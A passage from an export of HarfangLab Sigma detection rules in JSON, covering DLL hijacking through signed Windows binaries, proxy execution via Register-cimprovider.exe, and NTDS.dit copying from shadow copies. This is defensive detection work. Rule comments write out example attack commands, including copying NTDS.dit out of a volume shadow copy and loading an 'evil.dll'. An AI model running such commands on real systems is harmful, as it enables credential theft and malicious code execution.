"rule_name": "DLL Hijacking via chglogon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via chglogon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "06be143e-b032-4364-923d-de4d6d136dd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097139Z",
"creation_date": "2026-03-23T11:45:34.097140Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097145Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsacls.yml",
"content": "title: DLL Hijacking via DSACLS.exe\nid: 06be143e-b032-4364-923d-de4d6d136dd3\ndescription: |\n Detects potential Windows DLL Hijacking via DSACLS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DSACLS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "06be143e-b032-4364-923d-de4d6d136dd3",
"rule_name": "DLL Hijacking via DSACLS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via DSACLS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "06f328a3-6c34-4480-b44a-5ccfa923f899",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081565Z",
"creation_date": "2026-03-23T11:45:34.081567Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081571Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gamepanel.yml",
"content": "title: DLL Hijacking via gamepanel.exe\nid: 06f328a3-6c34-4480-b44a-5ccfa923f899\ndescription: |\n Detects potential Windows DLL Hijacking via gamepanel.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gamepanel.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\dcomp.dll'\n - '\\dwmapi.dll'\n - '\\DWrite.dll'\n - '\\dxgi.dll'\n - '\\msdrm.dll'\n - '\\uianimation.dll'\n - '\\UIAutomationCore.DLL'\n - '\\UxTheme.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "06f328a3-6c34-4480-b44a-5ccfa923f899",
"rule_name": "DLL Hijacking via gamepanel.exe",
"rule_description": "Detects potential Windows DLL Hijacking via gamepanel.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "070c26de-9c37-4449-81eb-9d5f6a91c83b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593760Z",
"creation_date": "2026-03-23T11:45:34.593764Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593771Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_musnotificationux.yml",
"content": "title: DLL Hijacking via musnotificationux.exe\nid: 070c26de-9c37-4449-81eb-9d5f6a91c83b\ndescription: |\n Detects potential Windows DLL Hijacking via musnotificationux.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'musnotificationux.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\DMCmnUtils.dll'\n - '\\UpdatePolicy.dll'\n - '\\UPShared.dll'\n - '\\WINHTTP.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "070c26de-9c37-4449-81eb-9d5f6a91c83b",
"rule_name": "DLL Hijacking via musnotificationux.exe",
"rule_description": "Detects potential Windows DLL Hijacking via musnotificationux.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "072eb6a2-64bf-4b66-86f2-77e8e429ef63",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586156Z",
"creation_date": "2026-03-23T11:45:34.586174Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586191Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_auditpol.yml",
"content": "title: DLL Hijacking via auditpol.exe\nid: 072eb6a2-64bf-4b66-86f2-77e8e429ef63\ndescription: |\n Detects potential Windows DLL Hijacking via auditpol.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'auditpol.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\auditpolcore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "072eb6a2-64bf-4b66-86f2-77e8e429ef63",
"rule_name": "DLL Hijacking via auditpol.exe",
"rule_description": "Detects potential Windows DLL Hijacking via auditpol.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "073992cd-3d71-4560-89eb-235eb6cfdf65",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086864Z",
"creation_date": "2026-03-23T11:45:34.086867Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086881Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/",
"https://twitter.com/PhilipTsukerman/status/992021361106268161",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_register_cimprovider.yml",
"content": "title: Suspicious Proxy Execution via Register-cimprovider.exe\nid: 073992cd-3d71-4560-89eb-235eb6cfdf65\ndescription: |\n Detects the use of Register-cimprovider.exe, which registers new WMI providers, to proxy the execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to execute malicious DLLs.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Register-CimProvider process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/\n - https://twitter.com/PhilipTsukerman/status/992021361106268161\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/03/01\nmodified: 2025/06/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.RegisterCimProvider\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\Register-cimprovider.exe'\n - OriginalFileName: 'Register-CimProvider2.exe'\n\n selection_command:\n # C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path C:\\AtomicRedTeam\\atomics\\T1218\\src\\Win32\\T1218-2.dll\n # Register-cimprovider -path \"C:\\folder\\evil.dll\"\n CommandLine|contains|all:\n - ' -path '\n - '.dll'\n\n exclusion_programfiles:\n CommandLine|contains:\n - ' -Path ?:\\Program Files\\'\n - ' -Path ?:\\Program Files (x86)\\'\n\n # https://learn.microsoft.com/fr-fr/troubleshoot/mem/configmgr/endpoint-protection/configmgr-console-shows-out-of-date-values\n exclusion_protectionmanagement:\n CommandLine|contains|all:\n - '-ProviderName ProtectionManagement -Namespace root\\Microsoft\\protectionmanagement -Path'\n - '\\ProtectionManagement.dll'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "073992cd-3d71-4560-89eb-235eb6cfdf65",
"rule_name": "Suspicious Proxy Execution via Register-cimprovider.exe",
"rule_description": "Detects the use of Register-cimprovider.exe, which registers new WMI providers, to proxy the execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to execute malicious DLLs.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Register-CimProvider process.\n",
"rule_creation_date": "2022-03-01",
"rule_modified_date": "2025-06-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "074c0895-1c28-4998-833c-644cd8fa5ff0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094771Z",
"creation_date": "2026-03-23T11:45:34.094773Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094777Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/003/",
"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1003_003_powershell_ntds_shadow_copy.yml",
"content": "title: NTDS Dumped from a Volume Shadow Copy via PowerShell\nid: 074c0895-1c28-4998-833c-644cd8fa5ff0\ndescription: |\n Detects a copy of the ntds.dit file from a Volume Shadow Copy with PowerShell in interactive mode.\n Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the domain controller to determine legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1003/003/\n - https://attack.mitre.org/techniques/T1006/\ndate: 2022/05/10\nmodified: 2025/09/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.003\n - attack.t1078\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n # copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\shadowcopy\n PowershellCommand|contains|all:\n - 'copy '\n - 'GLOBALROOT'\n - 'HarddiskVolumeShadowCopy'\n - 'ntds.dit'\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "074c0895-1c28-4998-833c-644cd8fa5ff0",
"rule_name": "NTDS Dumped from a Volume Shadow Copy via PowerShell",
"rule_description": "Detects a copy of the ntds.dit file from a Volume Shadow Copy with PowerShell in interactive mode.\nAdversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the domain controller to determine legitimacy.\n",
"rule_creation_date": "2022-05-10",
"rule_modified_date": "2025-09-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.003",
"attack.t1006",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "07c550a4-29ed-429b-8c3a-f6b59266b530",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593517Z",
"creation_date": "2026-03-23T11:45:34.593520Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593528Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sppextcomobj.yml",
"content": "title: DLL Hijacking via sppextcomobj.exe\nid: 07c550a4-29ed-429b-8c3a-f6b59266b530\ndescription: |\n Detects potential Windows DLL Hijacking via sppextcomobj.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sppextcomobj.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\adsldpc.dll'\n - '\\CRYPTBASE.dll'\n - '\\DNSAPI.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "07c550a4-29ed-429b-8c3a-f6b59266b530",
"rule_name": "DLL Hijacking via sppextcomobj.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sppextcomobj.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "07ddc2b1-4842-43eb-92d7-df872335fcf9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098449Z",
"creation_date": "2026-03-23T11:45:34.098451Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098455Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_adobe_licensing.yml",
